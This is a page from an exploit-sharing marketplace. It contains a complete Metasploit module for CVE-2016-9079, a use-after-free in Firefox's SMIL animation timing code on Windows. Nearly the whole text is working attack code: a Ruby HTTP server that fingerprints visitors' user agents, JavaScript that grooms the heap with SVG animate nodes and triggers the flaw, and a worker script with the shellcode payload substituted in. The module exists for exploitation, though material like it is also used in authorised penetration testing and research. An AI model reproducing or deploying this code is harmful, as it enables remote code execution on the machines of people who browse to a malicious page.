0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Mozilla Firefox nsSMILTimeContainer::NotifyTimeChange() Remote Code Execution Exploit
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info={})
super(update_info(info,
'Name' => "Firefox nsSMILTimeContainer::NotifyTimeChange() RCE",
'Description' => %q{
This module exploits an out-of-bounds indexing/use-after-free condition present in
nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox
on Microsoft Windows.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Anonymous Gaijin', # Original research/exploit
'William Webb <william_webb[at]rapid7.com>' # Metasploit module
],
'Platform' => 'win',
'Targets' =>
[
[ 'Mozilla Firefox',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
],
'DefaultOptions' =>
{
'EXITFUNC' => "thread",
'InitialAutoRunScript' => 'migrate -f'
},
'References' =>
[
[ 'CVE', '2016-9079' ],
[ 'Bugzilla', '1321066' ]
],
'Arch' => ARCH_X86,
'DisclosureDate' => "Nov 30 2016",
'DefaultTarget' => 0
)
)
register_options(
[
OptBool.new('UsePostHTML', [ true, 'Rewrite page with arbitrary HTML after successful exploitation. NOTE: if set to true, you should probably rewrite data/exploits/ff_smil_uaf/post.html to something useful!', false ]),
], self.class
)
end
def exploit_html(cli)
p = payload.encoded
arch = Rex::Arch.endian(target.arch)
payload_final = Rex::Text.to_unescape(p, arch, prefix='\\u')
base_uri = "#{get_resource.chomp('/')}"
# stuff that gets adjusted alot during testing
defrag_x = %Q~
for (var i = 0; i < 0x4000; i++)
heap80[i] = block80.slice(0)
~
defrag_y = %Q~
for (var i = 0x4401; i < heap80.length; i++)
heap80[i] = block80.slice(0)
~
js = %Q~
var worker = new Worker('#{base_uri}/worker.js');
var svgns = 'http://www.w3.org/2000/svg';
var heap80 = new Array(0x5000);
var heap100 = new Array(0x5000);
var block80 = new ArrayBuffer(0x80);
var block100 = new ArrayBuffer(0x100);
var sprayBase = undefined;
var arrBase = undefined;
var animateX = undefined;
var containerA = undefined;
var milestone_offset = 0x90;
var $ = function(id) { return document.getElementById(id); }
var heap = function()
{
var u32 = new Uint32Array(block80)
u32[4] = arrBase - milestone_offset;
u32[0xa] = arrBase + 0x1000 - milestone_offset;
u32[0x10] = arrBase + 0x2000 - milestone_offset;
var x = document.createElementNS(svgns, 'animate')
var svg = document.createElementNS(svgns, 'svg')
svg.appendChild(x)
svg.appendChild(x.cloneNode(true))
for (var i = 0; i < 0x400; i++)
{
var node = svg.cloneNode(true);
node.setAttribute('id', 'svg' + i)
document.body.appendChild(node);
}
#{defrag_x}
for (var i = 0; i < 0x400; i++)
{
heap80[i + 0x3000] = block80.slice(0)
$('svg' + i).appendChild(x.cloneNode(true))
}
for (var i = 0; i < 0x400; i++)
{
$('svg' + i).appendChild(x.cloneNode(true))
$('svg' + i).appendChild(x.cloneNode(true))
}
for (var i = 0; i < heap100.length; i++)
heap100[i] = block100.slice(0)
#{defrag_y}
for (var i = 0x100; i < 0x400; i++)
$('svg' + i).appendChild(x.cloneNode(true))
}
var exploit = function()
{
heap();
animateX.setAttribute('begin', '59s')
animateX.setAttribute('begin', '58s')
animateX.setAttribute('begin', '10s')
animateX.setAttribute('begin', '9s')
// money shot
containerA.pauseAnimations();
}
worker.onmessage = function(e)
{
worker.onmessage = function(e)
{
window.setTimeout(function()
{
worker.terminate();
document.body.innerHTML = '';
document.getElementsByTagName('head')[0].innerHTML = '';
document.body.setAttribute('onload', '')
document.write('<blink>')
}, 1000);
}
arrBase = e.data;
exploit();
}
var idGenerator = function()
{
return 'id' + (((1+Math.random())*0x10000)|0).toString(16).substring(1);
}
var craftDOM = function()
{
containerA = document.createElementNS(svgns, 'svg')
var containerB = document.createElementNS(svgns, 'svg');
animateX = document.createElementNS(svgns, 'animate')
var animateA = document.createElementNS(svgns, 'animate')
var animateB = document.createElementNS(svgns, 'animate')
var animateC = document.createElementNS(svgns, 'animate')
var idX = idGenerator();
var idA = idGenerator();
var idB = idGenerator();
var idC = idGenerator();
animateX.setAttribute('id', idX);
animateA.setAttribute('id', idA);
animateA.setAttribute('end', '50s');
animateB.setAttribute('id', idB);
animateB.setAttribute('begin', '60s');
animateB.setAttribute('end', idC + '.end');
animateC.setAttribute('id', idC);
animateC.setAttribute('begin', '10s');
animateC.setAttribute('end', idA + '.end');
containerA.appendChild(animateX)
containerA.appendChild(animateA)
containerA.appendChild(animateB)
containerB.appendChild(animateC)
document.body.appendChild(containerA);
document.body.appendChild(containerB);
}
window.onload = craftDOM;
~
# If you want to change the appearance of the landing page, do it here
html = %Q~
<html>
<head>
<meta charset="utf-8"/>
<script>
#{js}
</script>
</head>
<body>
</body>
</html>
~
if datastore['UsePostHTML']
f = File.open(File.join(Msf::Config.data_directory, "exploits", "firefox_smil_uaf", "post.html"), "rb")
c = f.read
html = html.gsub("<blink>", c)
else
html = html.gsub("<blink>", "")
end
send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
end
def worker_js(cli)
p = payload.encoded
arch = Rex::Arch.endian(target.arch)
payload = Rex::Text.to_unescape(p, arch)
wt = File.open(File.join(Msf::Config.data_directory, "exploits", "firefox_smil_uaf", "worker.js"), "rb")
c = wt.read
c = c.gsub("INSERTSHELLCODEHEREPLZ", payload)
c = c.gsub("NOPSGOHERE", "\u9090")
send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
end
def is_ff_on_windows(user_agent)
target_hash = fingerprint_user_agent(user_agent)
if target_hash[:ua_name] !~ /Firefox/ or target_hash[:os_name] !~ /Windows/
return false
end
return true
end
def on_request_uri(cli, request)
print_status("Got request: #{request.uri}")
print_status("From: #{request.headers['User-Agent']}")
if (!is_ff_on_windows(request.headers['User-Agent']))
print_error("Unsupported user agent: #{request.headers['User-Agent']}")
send_not_found(cli)
close_client(cli)
return
end
if request.uri =~ /worker\.js/
print_status("Sending worker thread Javascript ...")
worker_js(cli)
return
end
if request.uri =~ /index\.html/ or request.uri =~ /\//
print_status("Sending exploit HTML ...")
exploit_html(cli)
close_client(cli)
return
end
end
end
# 0day.today [2024-11-14] #